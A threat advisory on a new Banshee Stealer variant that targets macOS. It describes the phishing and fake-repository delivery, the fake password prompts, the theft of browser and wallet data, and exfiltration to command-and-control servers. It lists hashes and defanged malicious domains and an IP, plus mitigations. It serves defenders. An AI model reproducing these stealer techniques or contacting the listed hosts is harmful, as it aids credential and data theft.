macOS Users Targeted by the New Variant of Banshee Infostealer
Threat Group: Unknown
Threat Type: Information Stealer (Infostealer)
Exploited Vulnerabilities: No specific vulnerabilities exploited; relies on social engineering and phishing tactics
Malware Used: Banshee Stealer
Threat Score: High (8.5/10) – Due to its advanced evasion techniques, targeting of macOS systems, and comprehensive data theft capabilities.
Last Threat Observation: January 9, 2025
Overview
Banshee Stealer, a macOS-focused malware, has resurfaced with enhanced capabilities aimed at evading detection. Initially discovered in mid-2024 and offered as a malware-as-a-service (MaaS) for $3,000 per month, Banshee Stealer is designed to harvest sensitive information from compromised macOS systems. In late 2024, its source code was leaked, leading to a temporary shutdown of its operations. However, recent reports from January 2025 indicate that new variants have emerged, incorporating sophisticated evasion techniques inspired by Apple's XProtect antivirus engine.
Key Details
- Delivery Method: Primarily distributed through phishing websites and fake GitHub repositories impersonating popular software such as Google Chrome, Telegram, and TradingView.
- Target: macOS users, with a focus on extracting data from web browsers, cryptocurrency wallets, and system files.
- Functions:
- Harvests browser credentials, cookies, history, and autofill data from browsers including Chrome, Firefox, Brave, and Edge.
- Extracts information from cryptocurrency wallets such as Exodus, Electrum, Coinomi, and Ledger.
- Collects system information, including hardware and software details, and the user's public IP address.
- Employs fake macOS password prompts to deceive users into providing their system passwords.
- Compresses and encrypts collected data before exfiltration to remote servers.
- Obfuscation: The latest variant utilizes string encryption algorithms inspired by Apple's XProtect, allowing it to blend in with legitimate system processes and evade detection by antivirus systems.
Attack Vectors
Banshee Stealer is disseminated through deceptive methods, including:
- Phishing Websites: Malicious sites masquerading as legitimate download pages for popular software applications.
- Fake GitHub Repositories: Repositories that impersonate well-known software projects, tricking users into downloading and executing the malware.
Once executed, the malware performs the following actions:
- System Reconnaissance: Gathers detailed system information using commands like
system_profiler SPSoftwareDataType SPHardwareDataTypeand retrieves the public IP address via external services. - Credential Harvesting: Presents fake password prompts using AppleScript to capture user passwords, which are then validated and stored for further exploitation.
- Data Collection: Accesses and collects data from various browsers, cryptocurrency wallets, and specific file types located in common directories.
- Data Exfiltration: Compresses the collected data into a ZIP archive, encrypts it, and transmits it to a command-and-control server using HTTP POST requests.
Known Indicators of Compromise (IoCs)
FileHash-SHA256
- 00c68fb8bcb44581f15cb4f888b4dec8cd6d528cacb287dc1bdeeb34299b8c93
- 1dcf3b607d2c9e181643dd6bf1fd85e39d3dc4f95b6992e5a435d0d900333416
- 3bcd41e8da4cf68bb38d9ef97789ec069d393306a5d1ea5846f0c4dc0d5beaab
- b978c70331fc81804dea11bf0b334aa324d94a2540a285ba266dd5bbfbcbc114
- cdfbcb3d850713c49d451b3e80fb8507f86ba4ad9385e083c2a2bf8d11adc4fb
- ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038
- d04f71711e7749a4ff193843ae9ce852c581e55eaf29b8eec5b36c4b9c8699c2
- d8ecc92571b3bcd935dcab9cdbeda7c2ebda3021dda013920ace35d294db07be
IPv4
- 41[.]216[.]183[.]49
Domain
- alden[.]io
- api7[.]cfd
- authorisev[.]site
- coincapy[.]com
- contemteny[.]site
- data[.]country
- dilemmadu[.]site
- faulteyotk[.]site
- forbidstow[.]site
- fotor[.]software
- goalyfeastz[.]site
- opposezmny[.]site
- oxygen[.]solutions
- seallysl[.]site
- servicedny[.]site
- westar[.]io
Mitigation and Prevention
- User Awareness: Educate users about the risks of downloading software from unverified sources and the dangers of phishing attacks.
- Email Filtering: Implement robust email filtering to detect and block phishing attempts that may distribute the malware.
- Antivirus Protection: Ensure that antivirus solutions are updated regularly to recognize and mitigate new threats.
- Two-Factor Authentication (2FA): Enforce 2FA to add an extra layer of security, reducing the risk of unauthorized access.
- Monitor Logs: Regularly review system and network logs for unusual activity that may indicate a compromise.
- Regular Updates: Keep all software and operating systems up to date with the latest security patches to mitigate vulnerabilities.
Risk Assessment
The resurgence of Banshee Stealer with enhanced evasion techniques poses a significant threat to macOS users. Its ability to harvest a wide range of sensitive information, coupled with sophisticated methods to avoid detection, elevates the risk profile of this malware. Organizations and individuals using macOS should exercise heightened vigilance and implement comprehensive security measures to defend against potential infections.
Conclusion
Banshee Stealer exemplifies the evolving landscape of macOS-targeted malware, with threat actors continually adapting their tactics to bypass security measures. The incorporation of techniques inspired by legitimate security tools like Apple's XProtect underscores the need for continuous monitoring and updating of security protocols. Organizations are advised to remain alert, educate their users, and employ robust cybersecurity practices to mitigate the risks associated with this and similar threats.
Sources:
- BleepingComputer - Banshee stealer evades detection using Apple XProtect encryption algo
- The Hacker News - New Banshee Stealer Variant Bypasses Antivirus with Apple's XProtect-Inspired Encryption
- Checkpoint - Banshee: The Stealer That “Stole Code” From MacOS XProtect
- Alienvault - Indicators of Compromise